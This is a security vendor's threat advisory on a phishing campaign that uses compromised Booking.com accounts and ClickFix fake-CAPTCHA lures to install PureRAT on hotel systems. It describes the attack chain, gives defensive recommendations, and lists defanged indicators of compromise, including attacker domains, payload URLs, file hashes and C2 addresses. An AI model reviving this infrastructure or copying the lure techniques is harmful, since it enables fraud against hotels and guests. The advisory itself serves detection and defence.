Threat Advisories:
I Paid Twice: Inside the Booking.com Phishing Fraud Return of Gootloader: Blending Technical Evasion with Operational Discipline Unmasking Airstalk’s Covert Supply Chain Intrusion WordPress Plugin Bug CVE-2025-11833 Hands Hackers the Admin Throne Silent Lynx APT: Espionage Operations Targeting Central Asia’s Critical Infrastructure SleepyDuck: Trojan Nesting in the Open VSX Marketplace Operation SkyCloak: Covert Cyber Strikes on Russian and Belarusian Military Personnel Typosquatted npm Packages Execute Stealthy CredentialTheft Operation Hijackloader Strikes Colombia with PureHVNC Vietnamese Actors Use Recruitment Lures for Espionage and Theft Qilin Ransomware Surge: A Growing Global Threat to Critical Sectors ClickOnce Deception: SideWinder’s New Path to Diplomats The Gift Card Grinch Uncovered in the Jingle Thief Campaign WordPress Sites Under Siege by Old Critical Flaws Transparent Tribe’s DeskRAT Campaign Targets Indian Military Systems SessionReaper Flaw Enables Seamless Session Hijacking on Adobe Commerce CVE‑2025‑61932: Critical Lanscope Endpoint Manager Flaw Actively Exploited Lazarus Targets Europe’s UAV Innovation October 2025 Linux Patch Roundup MuddyWater Deploys Phoenix Backdoor in Targeted Espionage Campaign
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them. Powered by:
IntegrationsOut of box integrations available with a comprehensive set of Security and IT operations tools in your organisation.
HiveForce LabsThe in-house intelligence that enables customers to identify and address immediate cyber risks and potential threats with precision, clear insights, and swift action.
Hive Pro’s ComparisonSave Cost , Reduce Complexity and Increase Security by Augmenting and Replacing your existing Vulnerability Management platform
Hive Pro vs Rapid7
Hive Pro vs Tenable
Hive Pro vs Qualys
Hive Pro vs Nucleus Security
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Whitepapers
Press Releases
connect
Webinars & Videos
Blog
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoThreat Digest - Subscribe
Platform
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them. Powered by:
IntegrationsOut of box integrations available with a comprehensive set of Security and IT operations tools in your organisation.
HiveForce LabsThe in-house intelligence that enables customers to identify and address immediate cyber risks and potential threats with precision, clear insights, and swift action.
Hive Pro’s Comparison
Hive Pro vs Rapid7
Hive Pro vs Tenable
Hive Pro vs Qualys
Hive Pro vs Nucleus Security
Solutions
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Whitepapers
Press Releases
connect
Webinars & Videos
Blog
Company
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoThreat Digest - Subscribe

I Paid Twice: Inside the Booking.com Phishing Fraud

Amber | Attack Report
Download PDF

Booking.com Phishing Campaign: I Paid Twice Hospitality Industry Attack Report

Summary

A sophisticated phishing campaign has been targeting the global hospitality industry through compromised Booking.com and WhatsApp communications. This Booking.com phishing attack was discovered in April 2025 and involves the PureRAT malware, creating significant security risks for hotels and guests worldwide. The phishing campaign leverages stolen credentials and real reservation data to create highly convincing fraudulent messages that trick victims into revealing sensitive financial information. Attackers utilize the ClickFix redirection system to deploy PureRAT malware, granting remote access to hotel systems and customer data. This hospitality phishing fraud has evolved into a professionalized cybercrime ecosystem where stolen Booking.com accounts are actively traded for large-scale financial fraud operations.

Attack Details

The Booking.com phishing campaign represents a highly sophisticated threat to the hospitality industry, employing multiple attack vectors and advanced social engineering techniques. The phishing operation begins with credential theft through information-stealing malware that infiltrates hotel management systems, harvesting login credentials for booking platforms including Booking.com and Expedia. These stolen hospitality credentials are subsequently sold on cybercrime forums or directly weaponized for fraudulent email campaigns targeting both hotel staff and guests.

The attack methodology centers on malicious emails crafted to impersonate legitimate Booking.com communications sent to hotel administrative and reservation personnel. These phishing emails contain malicious links that activate the ClickFix redirection mechanism, compromising recipient machines through sophisticated social engineering tactics. Once hotel systems are infected with PureRAT malware, attackers gain unauthorized control of Booking.com extranet accounts, which they exploit to send authentic-appearing banking phishing messages to unsuspecting hotel guests. Victims are deceived into believing billing discrepancies exist, resulting in duplicate payments for the same reservation—the origin of the report’s title “I Paid Twice.”

The ClickFix attack infrastructure utilizes cleverly designed URLs following predictable patterns that redirect users through multiple web pages using JavaScript and HTML meta tags. These redirects bypass iframe protections and ultimately lead victims to malicious sites impersonating Booking.com, complete with fake reCAPTCHA verification prompts that conceal PowerShell command execution. The phishing infrastructure shares a common IP address hosting numerous domains, including pornographic and fake websites, suggesting attackers employ a Traffic Distribution System (TDS) to manage redirections and obfuscate their operational infrastructure.

Upon PowerShell execution, the malware downloads additional scripts that perform system reconnaissance and fetch a ZIP archive from compromised legitimate websites. This archive contains binaries exploiting DLL side-loading techniques to stealthily deploy PureRAT directly into system memory. PureRAT malware establishes persistence through Windows registry modifications and maintains secure communications with Command-and-Control (C2) servers. The modular malware architecture enables remote command execution, sensitive data exfiltration, remote interface control, and surveillance through webcam and microphone capture—all without leaving obvious disk-based forensic traces.

This Booking.com phishing operation illuminates a thriving cybercrime ecosystem specifically targeting the hospitality sector. Compromised Booking.com extranet credentials have become valuable commodities traded through Russian-speaking forums and Telegram bots. Organized cybercriminal groups called “traffers” distribute hospitality malware at scale through profit-sharing arrangements, while specialized “log checkers” authenticate stolen credentials before sale. This professionalized underground market enables large-scale hospitality fraud affecting both hotel properties and their guests globally.

Recommendations

Verify Before You Click: Hotel staff and guests must exercise extreme caution with email communications appearing to originate from Booking.com or trusted hospitality brands. Always verify sender email addresses carefully and scrutinize message content for unusual urgency, unexpected payment requests, or unfamiliar links. If any element appears suspicious, contact Booking.com directly through their official website or mobile application rather than responding to potentially fraudulent messages. This verification step is critical for preventing Booking.com phishing attacks.

Secure Your Booking and Hotel Accounts: Hotel administrators should implement robust security measures for all booking platform accounts by creating strong, unique passwords and enabling multi-factor authentication (MFA) on Booking.com extranet and similar hospitality systems. Regularly audit login activity for suspicious access patterns and immediately revoke access for any unauthorized login attempts. These account security practices significantly reduce hospitality credential theft risks.

Train Staff on Phishing Awareness: Employees handling reservations and payment processing represent primary targets for hospitality phishing campaigns. Conduct regular security awareness training demonstrating how phishing emails appear, identifying red flags indicating fraudulent communications, and establishing procedures for safely reporting suspicious messages. Comprehensive phishing awareness training strengthens organizational defenses against social engineering attacks targeting the hospitality industry.

Monitor Network and PowerShell Activity: IT security teams should implement continuous monitoring for unusual PowerShell executions, unauthorized registry modifications, and processes establishing unexpected network connections. These indicators frequently signal PureRAT malware or similar remote access trojans compromising hotel systems. Advanced endpoint monitoring capabilities enable early detection of hospitality-targeted malware infections.

Enhance Endpoint Protection: Deploy next-generation antivirus (NGAV) and endpoint detection and response (EDR) solutions capable of identifying and blocking sophisticated malware threats. Leverage behavioral analysis and machine learning-based detection technologies to identify suspicious activity patterns characteristic of hospitality phishing campaigns. Robust endpoint protection provides critical defense layers against evolving hospitality cybersecurity threats.

Indicators of Compromise (IoCs)

Malicious URLs Associated with Booking.com Phishing Campaign:

The following URLs have been identified as part of the hospitality phishing infrastructure. These malicious links redirect victims through the ClickFix system to deploy PureRAT malware:

hxxps[://]headkickscountry[.]com/lz1y, hxxps[://]activatecapagm[.]com/j8r3, hxxps[://]homelycareinc[.]com/po7r, hxxps[://]byliljedahl[.]com/8anf, hxxps[://]jamerimprovementsllc[.]com/ao9o, hxxps[://]seedsuccesspath[.]com/6m8a, hxxps[://]zenavuurwerkofficial[.]com/62is, hxxps[://]brownsugarcheesecakebar[.]com/ajm4, hxxps[://]hareandhosta[.]com/95xh, hxxps[://]customvanityco[.]com/izsb, hxxps[://]byliljedahl[.]com/lv6q, hxxps[://]ctrlcapaserc[.]com/bomla, hxxps[://]bknqsercise[.]com/bomla, hxxps[://]bkngssercise[.]com/bomla, hxxps[://]bkngpropadm[.]com/bomla, hxxps[://]cquopymaiqna[.]com/bomla, hxxps[://]emprotel[.]net[.]bo/updserc[.]zip, hxxps[://]cabinetifc[.]com/upseisser[.]zip, hxxps[://]ctrlcapaserc[.]com/loggqibkng, hxxps[://]bqknsieasrs[.]com/loggqibkng, hxxps[://]confirmation887-booking[.]com/17149438, hxxps[://]verifyguest02667-booking[.]com/17149438, hxxps[://]guest03442-booking[.]com/17149438, hxxps[://]confirmation8324-booking[.]com/17149438, hxxps[://]cardverify0006-booking[.]com/37858999, hxxps[://]verifycard45625-expedia[.]com/67764524

Malicious Domains Used in Hospitality Phishing Operations:

These domains impersonate legitimate Booking.com services and facilitate credential theft:

whooamisercisea[.]com, whooamisercise[.]com, aidaqosmaioa[.]com, bqknsieasrs[.]com, update-infos616[.]com, mccplogma[.]com, mccp-logistics[.]com, cquopymaiqna[.]com, contmasqueis[.]com, update-info1676[.]com, admin-extranet-reservationsinfos[.]com, eiscoaqscm[.]com, comsquery[.]com, caspqisoals[.]com, ctrlcapaserc[.]com, admin-extranet-reservationsexp[.]com, admin-extranetmngrxz-captcha[.]com, admin-extranetrservq-cstmrq[.]com, admin-extranetadmns-captcha[.]com, extranet-admin-reservationssept[.]com, bkngssercise[.]com, admin-extranetmnxz-captcha[.]com, bknqsercise[.]com, admin-extranetadm-captcha[.]com, bookreservfadrwer-customer[.]com, bookingadmin-updateofmay2705[.]com, breserve-custommessagehelp[.]com, confvisitor-doc[.]com, confirminfo-hotel20may05[.]com, guestinfo-aboutstay1205[.]com, confsvisitor-missing-items[.]com, guesting-servicesid91202[.]com, booking-agreementstatementapril0429[.]com, booking-agreementaprilreviews042025[.]com, booking-viewdocdetails-0975031[.]com, booking-agreementstatementapril0225[.]com, api-notification-centeriones[.]com, booking-visitorviewdetails-64464043[.]com, booking-reservationsdetail-id0025911[.]com, booking-refguestitem-09064111[.]com, reserv-captchaapril04152025[.]com, booking-reviewsguestpriv-10101960546[.]com, booking-aprilreviewstir-9650233[.]com, booking-confviewdocum-0079495902[.]com, booking-confview-doc-00097503843[.]com, booking-reservationinfosid0251358[.]com, sqwqwasresbkng[.]com

PureRAT Malware File Hashes (SHA256):

703355e8e93f30df19f7f7b8800bd623f1aee1f020c43a4a1e11e121c53b5dd1

5301f5a3fb8649edb0a5768661d197f872d40cfe7b8252d482827ea27077c1ec

64838e0a3e2711b62c4f0d2db5a26396ac7964e31500dbb8e8b1049495b5d1f3

Command and Control Infrastructure (IP:Port):

85[.]208[.]84[.]94[:]56001

77[.]83[.]207[.]106[:]56001

MITRE ATT&CK TTPs

The Booking.com phishing campaign employs numerous tactics, techniques, and procedures mapped to the MITRE ATT&CK framework:

Resource Development (TA0042): Attackers compromise accounts (T1586) including email accounts (T1586.002) to establish infrastructure for phishing operations.

Initial Access (TA0001): The campaign utilizes phishing (T1566) through spearphishing links (T1566.002) to gain initial access to hospitality systems.

Execution (TA0002): Victims execute malicious code through user execution (T1204) of malicious links (T1204.001) and malicious copy-paste operations (T1204.004). PowerShell (T1059.001) executes malware payloads.

Persistence (TA0003): PureRAT establishes persistence through boot or logon autostart execution (T1547) via registry run keys and startup folder modifications (T1547.001).

Defense Evasion (TA0005): The malware employs hijack execution flow (T1574) through DLL side-loading (T1574.001), obfuscated files or information (T1027), masquerading (T1036), and process injection (T1055) including process hollowing (T1055.012).

Credential Access (TA0006): Attackers steal credentials from password stores (T1555) including password managers (T1555.005) and employ input capture (T1056) through keylogging (T1056.001).

Discovery (TA0007): The malware performs system information discovery (T1082), software discovery (T1518) targeting security software (T1518.001), and process discovery (T1057).

Collection (TA0009): PureRAT captures data from local systems (T1005) and implements screen capture (T1113) capabilities.

Exfiltration (TA0010): Stolen data is exfiltrated over C2 channels (T1041).

Command and Control (TA0011): The malware communicates using application layer protocols (T1071) including web protocols (T1071.001), encrypted channels (T1573), proxies (T1090), and command and scripting interpreters (T1059) including JavaScript (T1059.007).

Additional techniques include impersonation (T1656) of legitimate hospitality services throughout the phishing campaign.

References

Detailed technical analysis of the Booking.com phishing campaign targeting hotels and customers is available from SEKOIA: https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/

Threat Advisory Details:

Attack Discovered: April 2025
Threat Level: Amber
Publication Date: November 11, 2025

What’s new on HivePro

Get through updates and upcoming events, and more directly in your inbox